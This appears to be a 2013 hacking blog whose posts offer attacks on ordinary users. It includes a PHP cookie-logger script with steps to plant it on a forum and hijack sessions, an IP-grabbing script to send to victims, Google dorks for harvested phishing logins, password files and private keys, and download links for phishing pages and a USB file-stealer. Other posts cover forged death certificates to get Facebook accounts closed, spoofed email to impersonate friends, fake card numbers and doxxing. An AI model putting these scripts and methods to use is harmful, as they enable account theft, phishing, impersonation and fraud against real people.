Thursday 31 October 2013

Undetectable Facebook Phishing 2013

Hello Friends!! I hope you will be fine.
Today am gonna share with you a new FACEBOOK phishing script , which is undetectable 100% from any latest Antivirus.....



Here it is a screenshot of that script:



You can download this script from this link:

                           DOWNLOAD


After uploading on a free web hosting site , there will be file with name 'phished' , you can open this file by this method

www.yoursitename.phished


And all your phished Emails and passwords will be in it....


Thanks 4 visiting my BLOG!!!

How to find a Facebook Profile from a Picture on Facebook

How to find a Facebook Profile from a Picture on Facebook


Often times, you're working on dox'ing someone, and you hit a dead end. This will help you find a Facebook profile from just a Facebook picture's URL.

Prerequisites

  • able to right click an image and view it directly

or...
  • have the file saved, with a name like "424409_692808840729355_619847439_n.jpg"

Guide
  • Take a look at the Facebook URL from the image you've got (Facebook even keeps the ID in the name when you save-as a picture to your PC):

  • https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-ash3/1424409_692808840729355_619847439_n.jpg

  • The important part of the URL is the last chunk of numbers near the end of it:  (like this)

  • Usually, the center group of numbers (called a Facebook ID, or FBID for short) is the ID of the Facebook we're looking for.

  • Take that ID, and add it after Facebook's URL, like below: (in my example, I used the ID from the URL above)

  • This takes us to that user's Facebook profile and/or the photo album that photo came from.

Notes

  • You can also try the two other groups of numbers in the original URL as well, to see if you get a profile.....

Thanks 4 visiting my BLOG!!!

Find Out Login Details That Have Been Phised

Hello Visitors!!!
I am here to let you know about something I've just found out, a Google dork, which is essentially hacking phishing sites. Not hacking like gaining access to the full website, but hacking the login details that the website holds....


Here's the DORK:


filetype:txt & intext:"email=" & intext:"pass=" & intext:"charset_test="


Simply Google it....

like this:


When you Google that, you will find websites that have login details for websites. For example, the first link, http://www.esperanta.net/m/fb.txt has 'fb.txt' at the end, meaning this is login details for Facebook.

Really simple, hope you enjoyed and make good use out of this!....Big Grin

Thanks 4 visiting my BLOG!!!

Wednesday 30 October 2013

Update your facebook status via your own name app

Hello GUYZ!! You might have seen that there are many apps that post on your wall and it has a small link at the bottom right corner telling VIA (app name). so how did they do that its very easy you need API (application programming interface) key of any app to do that.
We will make a app of our name so that we can use our apps` ID and update facebook status via it...
 STEPS
  1. Go to facebook developers then create an app by selecting app tab on the upper side....


 2. Then there will be a small box asking for app names in app display name ,  you can fill out any name which you want to show under your status and then click I agree facebook platform policies (even if you don't LOL )...

3. Then fill the security check (captcha) and then you will be taken to app settings then save changes and then you will see , there will be an App ID and App Secret ,  in that our useful one is App ID. Simply save it....

Like I have done..


4. Then go to this link:

https://www.facebook.com/dialog/feed?_path=feed&app_id=xxxxxxxxxxxxxxx&&redirect_uri=https%3A%2F%2Fwww.facebook.com&display=popup&to&from_login=1

5. (here xxx is your App  ID) copy your App ID in place of xxxxxx and then hit the big enter button and you will see that there will be a update status button just write what ever you want and bravo you have updated your status VIA your own name APP.....

I hope you guys will enjoy this...

Thanks 4 visiting my BLOG!!!!

Tuesday 29 October 2013

How to use Google as a Proxy


Using Google as a proxy is a neat little trick you can use to bypass work or school filters with ease.

Prerequisites
  • none, this shit is easy.

Guide
 





  • translate your language from anything to your language (in my case, English)
  • insert the URL you'd like to visit in the translate box
  •   

    • click the "translated" URL on the right
    • you're now using Google as a proxy.
    • to test this, you could translate WHATISMYIP to see if you see Google's IP
    • and, we do:




    I hope you will enjoy!!!

    Thanks 4 visiting my BLOG!!!

    How to track location of person on any chat box

    How to track location of person on any chat box
    How to Track an other person on facebook chat room
    We will be track person by Location tracking codes, which you present in chat room
    land on page with good pictures. meanwhile, the other chat buddy's IP Address is stored in a database. IP Look Up identify
    Country, Near city, Local time, etc.. of the other buddy.


    Step 1 :~ First of all Sign in on Click Here

    Step 2 :~ Click on any one Landing page preview picture.

    from bottom of this page

    Select, 'Copy' (ctrl+C) 'Tracking Code' from that

    page.

    Step 3 :~When you are in Live Chat with a buddy, Paste the track code in IM text box.

    Ask your chat buddy to click and see the 'Picture'

    Step 4 :~Give your chat buddy a little time to click and watch the 'picture'.

    Now, click Track Result in "this page" and see your buddy's Location. 

    How to steal files with a USB

    How to steal files with a USB
    Heres a short and easy way to take all files off someones computer onto a USB.

    Download Link:   http://adf.ly/YRxtR



    Virus scan LINK:



    https://www.virustotal.com/en/file/035ee78cc29aa816f2eab83b1bf6e6d93c56fde124cb69d5d56e22c757711a29/analysis/1383065010/


    How to use it:
    1.) Download the link provided above and save it onto a USB.
    2.) Go to your victims computer and click on FUD.bat
    3.) Then you will get a copy of all there files on your usb.
    Will take less then a minute for all there main files to convert to the USB....


    Thanks 4 visiting my BLOG!!!

    All Source Codes Of Visual Basic

    In this post , you can download a mega pack of source code , simply download and always'be a good editor' :D ......



                                 
                               DOWNLOAD

    Thanks 4 visiting my BLOG!!!

    Fake Sms Script by A-T

    Here you can download Fake Sms Script which support NEXMO , put you own API Key and Secret and enjoy!
    It has a feature to store your messages history!
    Download link is below:



                                            
                                            DOWNLOAD
                                             pass: adnant

    Thanks 4 visiting my BLOG!!!

    Sunday 27 October 2013

    How To Find VNC Using Google

    Hello!!!!  Today i'm going to teach you how to find random VNC using google.
    Just search following in google:



    intitle:"VNC Viewer for Java"




    and click on a link and you have found a VNC........ Big Grin......


     Thanks 4 visiting my BLOG!!!

    Close any Facebook account in 24 hours

    Step 1 - Go to this url:

    http://www.facebook.com/help/contact.php...m=deceased


    So this is the Url we will use to Report our slave. This Form allows you to report a deceased person (someone who is dead).




     

    Step 2 - Complete the Fields:

    Explain:
    Full Name: Your Victims Full name(Name last name)
    Date of birth: Go at his profile and click at Info tab and get his date of birth.
    Account Email Addresses: Do the same thing, go to his profile and click on info tab and get his email addresses.
    Networks: Again,go to his profile and click on Info tab and get his networks, copy them and paste in the form.
    Web address of profile you would like to report: Just go to his profile and copy the link in the address bar.
    Relationship to this person: To make more believable select Immediate Family.
    Requested Action: Remove Profile
    Proof Of Death: This is the hardest part of this form. Now to make a proof of a death just Google in your language a "Death Certificate" or "Certificate of a Death". It doesn't matters from what country you are, just use this Italian certificate and open up photoshop or whatever Image
    Editor and just write in a blank field:
    Annunciamo il morte di [name goes here]. Save your image to desktop and upload it in one of the Image
    Free Hosting like: http://imageshack.us
    And it's done Wink... Italian Death Certificate:
    Additional Information: Write what you want, just write that you are in his/her family and you would like to close his/her Facebook account because you won't like that when he is dead, his Facebook is opened.

    Step 3 - Click on Submit and then a message will appear:
    Your injury was submitted at Facebook Team .. So the meaning is that one of the mod's of Facebook will review your report and will do the right decision. It works in most of the times. I closed a few ones.......



    Thanks 4 visiting my BLOG!!!

    Create a Cookie Logger and Hack any Account!

    A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
    Today I am going to show How to make your own Cookie Logger…
    Hope you will enjoy Reading it...

    STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif

    <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a>

    STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php


    $filename = “logfile.txt”;
    if (isset($_GET["cookie"]))
    {
    if (!$handle = fopen($filename, ‘a’))
    {
    echo “Temporary Server Error,Sorry for the inconvenience.”;
    exit;
    }
    else
    {
    if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE)
    {
    echo “Temporary Server Error,Sorry for the inconvenience.”;
    exit;
    }
    }
    echo “Temporary Server Error,Sorry for the inconvenience.”;
    fclose($handle);
    exit;
    }
    echo “Temporary Server Error,Sorry for the inconvenience.”;
    exit;
    ?>

    STEP 3: Create a new Notepad File and Save it as logfile.txt
    STEP 4: Upload this file to your server
    cookielogger.php - > http://www.yoursite.com/cookielogger.php
    logfile.txt- > http://www.yoursite.com/logfile.txt
    fun.gif - > http://www.yoursite.com/fun.gif
    If you don’t have any Website then you can use the following Website to get a Free Website which has php support:

    http://www.000webhost.com/

    STEP 5: Go to the victim forum and insert this code in the signature or a post :

    <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a>

    STEP 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:

    phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6% ​3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

    STEP 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

    STEP 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.

    NOTE: Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.........



    Thanks 4 visiting my BLOG!!!!

    How To Get Someone IP with PHP

    HY visitors! Here in this will teach you ''how to get someone IP and other details like port & browser etc etc with PHP"......

    1: Simply copy this script  and make a PHP file with this:




    <?php

    //IP Grabber

    //Variables

    $protocol = $_SERVER['SERVER_PROTOCOL'];
    $ip = $_SERVER['REMOTE_ADDR'];
    $port = $_SERVER['REMOTE_PORT'];
    $agent = $_SERVER['HTTP_USER_AGENT'];
    $ref = $_SERVER['HTTP_REFERER'];
    $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);

    //Print IP, Hostname, Port Number, User Agent and Referer To Log.TXT

    $fh = fopen('log.txt', 'a');
    fwrite($fh, 'IP Address: '."".$ip ."\n");
    fwrite($fh, 'Hostname: '."".$hostname ."\n");
    fwrite($fh, 'Port Number: '."".$port ."\n");
    fwrite($fh, 'User Agent: '."".$agent ."\n");
    fwrite($fh, 'HTTP Referer: '."".$ref ."\n\n");
    fclose($fh);
    ?>




    2: Then upload on any hosting site and send link to victim.

    3: Victim information will save in a file called 'log.txt'

    IF you are having some problem to make file you can download this script from the following link:

                                Download

    Thanks 4 visiting my BLOG!!!! 

    How To Use Google To Hack FACEBOOK And Other Accounts


    Prerequisites:

    (This one is Easy!)

    1. A modern web browser (i recommend Firefox or Google Chrome) and Internet (Duh, Broadband).
    2. Time


    In order for these to work, all you have to do is simply copy and paste the dork into Google and search it [Image: biggrin.gif]


    Method 1: Facebook!
    We will be using a Google dork to find usernames and passwords of many accounts including Facebook!

    The Dork:
    intext:charset_test= email= default_persistent=
    Enter that into Google, and you will be presented with several sites that have username and passwords lists!



    Method 2: WordPress!

    This will look for WordPress backup files Which do contain the passwords, and all data for the site!
    The Dork:
    filetype:sql inurl:wp-content/backup-*

    Method 3: WWWBoard!

    This will look for the user and passwords of WWWBoard users
    The Dork:
    inurl:/wwwboard/passwd.txt
    Method 4: FrontPage!


    This will find all users and passwords, similar to above.
    The Dork:
    ext:/wd inurl:/service | authors | administrators | users) "# -FrontPage-"


    Method 5Symfony: !
    This finds database information and logins
    The Dork:
    inurl:config/databases.yml -trac -trunk -"Google Code" -source -repository

    Method 6: TeamSpeak! (big one!!!!!)
    This will search for the server.dbs file (a Sqlite database file With the SuperAdmin username and password!!!)
    The Dork:
    server-dbs "intitle:index of"
    Method 7: TeamSpeak2!!! (also big!)

    This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for "superadmin account info:"
    The Dork:
    "inurl:Teamspeak2_RC2/server.log"

    Method 8: Get Admin pass!
    Simple dork which looks for all types of admin info
    The Dork:
    "admin account info" filetype:log


    Method 9: Private keys! (not any more!)
    This will find any .pem files which contain private keys.
    The Dork:
    filetype[Image: tongue.gif]em pem intext[Image: tongue.gif]rivate
    And the Ultimate one, the regular directory full of passwords....

    Method 10: The Dir of Passwords!
    Simple one!
    The Dork:
    intitle:"Index of..etc" passwd

    All Phishing Pages

    HELLO guyz!! I hope everyone will fine! Today gonna share with you all phishing pages which in now a days are using.....
    like FACEBOOK , GMAIL , YAHOO and TWITTER....





    Simple download all the pages from the below link:



    Download (click here)

    and upload these pages on any web hosting site and then send links to victim.......

    HAPPY PHISHING!!!!!
     

    Thanks 4 visiting my BLOG!!!!

    How to inbox people from anyones account [TUT]

    Step 1: First off you will need to pick 2 people from your friends list. One will be the inbox sender and one will be the reciever.
    Lets say we picked John for the inbox sender and Mark for the reciever.


    Step 2: Since John is sending the inbox we need to get his Facebook login email. Go to their profile and click on about.. wait.. what's this? Their login email is hidden? Well we're going to have to use something else to get their email.. hmm.. I got it!

    Note: Their login email is not their @facebook.com email.

    Step 3: Since their email may be hidden we need to use something else to get it. Go to Yahoo.com and login with Facebook. Once you have set it all up click import contacts from Facebook. Boom, you have almost everyone in your friend lists email address. Search for your inbox sender and copy his email address. Lets say John's email is John@john.com

    Step 4: Head on over to http://emkei.cz/ 





    This is a spoof email sender and can send an email to anyone as anyone. Where it says 'From name:' and 'From email:' put the senders email address. So it should look like
    From name: John@john.com
    From email: John@john.com

    Step 5: Now you must find the receivers @facebook.com email to receive the fake email in their inbox. Head over to the receivers Facebook profile and click on about, and copy their @facebook.com email.
    Lets say Mark's @facebook.com email is mark.mark@facebook.com

    Step 6: Go back to the email sender and where it says 'To:' add the Facebook email address.
    To: mark.mark@facebook.com

    Step 7: Do not write anything in 'Subject:' just go down to 'Text:' and add what ever you want to send to the person.
    The page should look like:

    From name: John@john.com
    From email: John@john.com
    To: mark.mark@facebook.com
    Subject:
    Text: Hacked by Jesus

    Now fill out the Captcha and click send.

    Hurrah, you have now sent an inbox from your friends account to your other friends account! You can also update statuses via this method by finding out what their upload email is, but that is for a different tutorial.,,,,,


    Thanks for visiting my BLOG!!!

    How to Get Free Domain Name from Google: .COM / .ORG / .NET / .CO / .IN

    1) Go to GYBO Website (By Google)


    GYBO : Get Your Business Online


    2) Click Get Online button next to the image, like below:



    3) Click Create your Website button to start the wizard.



    4) Now Login to your Gmail account and allow 
    the application to use your account for signup.



    5) Now you'll be redirected to Intuit website to 
    continue the wizard of Free Domain Name.





    6) Click Choose a domain (www.yourname.com) 
    for your Website


    7) Then put the domain name you want to get,

    and click Check Availabilty . If it's available then

    you can proceed to the following step. Click Get 

    Domain




    8) Fill the personal info with your real info

    (Name, Last Name, Phone Number...) and click 

    Next




    9) Then Uncheck the button that says Domain

    Privacy (it costs 1$) and Check Terms and 

    Conditions
     10) After that, enter your Billing Information

    (Credit Card Number...) or use 

    FakeNameGenerator to generate fake Credit

    Card Number + CVV + Name on Card...


    Now you have successfully done!!!

    Thanks for visiting my BLOG!!!!

    Get a RDP for 7 Days Free

    Hello! Here you can see how to get a free RDP for 7 Days.....

    1 : Open This Web 

    http://www.desktone.com/






    2: click on 'Free Trial'

    3: click 'Sign UP' andfill the form and 

    then click 'Register'....

    4: Now check your e-mail inbox and 

    enjoy.....

    Thanks 4 visiting my BLOG!!!

     

    Saturday 26 October 2013

    Internet Download Manager 6.18 with patch



    Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.
    Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads.
    Internet Download Manager supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, authorization, MP3 audio and MPEG video content processing. IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozilla Firebird, Avant Browser, MyIE2, and all other popular browsers to automatically handle your downloads.



                                                               Download

    Free Skype Credit

    Free Skype Credits Through Bing Rewards

    It’s very easy to get the Free Skype Credit in just a few click and few Web Search Query.
    You can also Get Free Amazon Gift Card using Bing Rewards Program

    These Bing Rewards Program is only for United States. But you other country can also participate in this Rewards program.

    Tweak to get it:
    1. First you need to have Proxy Softwares or VPN Service ( Use my free vpns listed in this blog Click Here)
    2. You need to Sign In to United States IP
    3. And Sign Up for the Bing Rewards Program
    4. Once after Signing Up for the Rewards progam you can Sign In and use this Reward service from your Normal IP address.
    After you Sign In from your normal IP you need to do some changes in the Bing Search.
    • Open http://www.Bing.com
    • Then click on Preferences
    • And click on Worldwide
    • Select United States – English
    • Then you can see a new Rewards Option
    • Click on that Rewards option
    • And Sign In from there 

    Bing Rewards

    So Get started today to get Free Skype Credits using few steps:
    1st Step: You need to have Facebook or Hotmail Account to Sign Up for Bing Rewards Program.

    2nd Step: After Sign Up for the account. Sign In to your Bing Rewards Account, You will be taken to the below Bing Reward Dashboard

    3rd Step: To get Skype Voucher you need to Earn some Credits,to earn Credits you need to complete some task’s.
    4th Step: To Compleate those Task’s you need to go to Offers tab*,Click on the Offers Tab
    5th Step: You need to compleate each and every offer to earn credits, you need complate offers in
    • Your Offers
    • Welcome
    • Bing Explore Tour
    You can see the Levels in this Bing Reward Program
    1. Member
    2. Silver
    3. Gold
    In each Level there are some requirments you need to qualify those to Increase you Level.
    After you Reach 200 Lifetime Credits you will get 50 Credits as Bonus.
    If you reach Gold Level you will get Discounts on the Skype Vouchers and etc.
    You also get Discounts on other Offers also !!

    Here are the some of the Offers you Win using Bing Rewards Program :
    You Can also donate and participate in sweeptake also


    Thanks 4 visiting my BLOG!!!!

    Trace the hackers

    Trace the Hacker | Trace down the Trojan Horse attacker in few simple steps | 
     
    What is a RAT?

    RAT: So basically Rat is known as a Remote administrator tool. It Is
    Used to hack remote A PC without any authentication. There are so many
    Similar Rat tools Available Online . Rat Allows a Remote attacker to
    control the infected Computer according to his own wish and Way to carry
    out many kind of malicious & illegal activity as he has the
    complete administrator rights of the Remote Computer . Remote
    administration tool like dark comment is installed on victim’s Computer
    without the victim’s knowledge.



    Basic Functions of RAT are -

    ⦁ Capture Webcam images
    ⦁ Turn Firewall on/off
    ⦁ Simple Pranks by deleting files & turning off computer
    ⦁ Let's us execute virus in the victim’s PC
    ⦁ Enables us to download files from victim’s PC
    ⦁ DDos from victim’s PC

    Below are some names of different types of RAT Software’s -
    Dark Comet RAT
    Black shades RAT
    Xtreme RAT
    Cybergate RAT
    Sub Seven
    Pain RAT
    JRAT
    Net Devil
    Apocalypse RAT
    Shark RAT
    Back Orifice
    Bandook RAT
    Bifrost
    LANfiltrator
    Optix Pro
    ProRat


    So This Were Some Basic Information About The Rat.Let's now move to the our main Topic Tracing The Hacker.

    Requirements :



    1. TCPView <=== Click And Download This
    2. Knowledge about process running in windows
    3. Little Knowledge About Rats
    4. Brain

    First Of All let's Assume that You Are The victim Of A rat. You realized
    it when you started noticing some unusual activities taking place on
    your computer. like some of the programs get closed without your
    permission , Your webcam start automatically, PC shuts downs
    automatically and other things !.

    So while the hacker is connected to your PC, he is in danger too as he
    can be traced easily. Now we are going to use a tool which can help us
    to find the attackers IP address, Geographical Location and a lot more
    information about the attacker.

    TCPView: It is program that shows the complete detailed listings of all
    TCP and UDP endpoints on your system, it including the local, remote
    addresses and state of TCP connections. As almost all remote hacks are
    prepared over the Internet, you will be able to use TCPView Which Will
    Help You To Find If Any Remote PC Is Connected To Your PC. In Simple
    Language It Allows us to view all the TCP/IP connections on your
    Computer.

    So Download TCP View from the below given link and extract all the files on the Desktop And then Start TCPView.




    Now as you can see in the screenshot above it displays all of the active
    TCP/IP connections on your computer. If there is a remote user
    connected to your computer at this time, then TCPView will show their
    connection, IP address & other details



     So here I have Infected my own computer with my own RAT. As you can see
    in the image a Reverse Connection has been Established on the ip
    127.0.0.1 which is localhost. Here as an Attacker i am using local host
    ip address for the reverse connection. But In Your case the attacker
    will use the static IP address So that he will be Connected to Your PC
    Permanently. In the image also Check the Port No. 1604 ! Looking Odd
    ?? Actually there is no Service which runs on the Port No. 1604 For
    More Info you can Check On Google. So Once you have Found out the
    attackers IP Address now its time to locate the infected file, where it
    is placed! . To Locate the Infected RAT file Just Double Click On It and
    you Can also Kill the Connection now . So Just Right Click On the
    Unknown Connection and Kill the Task & then you are completely
    done!. You computer is now disinfected & you also got the IP Address
    of the attacker.
     
    Here's the screenshot of the Location of the RAT file that you the Victim Installed Our PC.


    Later you can do whatever you want to do with the attackers IP Address.
    Report it to the cyber police or Attack him back & blah blah !!
     
    Be Safe! Keep Hacking !


    Thanks 4 visiting my BLOG!!

    Get a free Spain Number (+34)

    METHOD :




    Please follow these steps for use.
     

    1:Open this site 




    http://tools.lleida.net/ 






    2:Select a language  from top.


    3:Register


    4:After registration you will get one

     confirmaton email.
    5: and Now you will have a new


    spain virtual number (+34).......



    Thanks 4 visiting my BLOG!

    Warid Online Data Finder

    Here you can find warid number details:



    Gmail verification bypass 100% working


     Get a free spain number from the below link:

    Now open your account on 

    http://tools.lleida.net/

    and type your spain number in google
    verification box as shown:


    then you will receive verification in you lleida account:



    Simply Now type this verification code to verify you account:


    and you gmail account will verify.....

    Thanks 4 visiting my BLOG!!!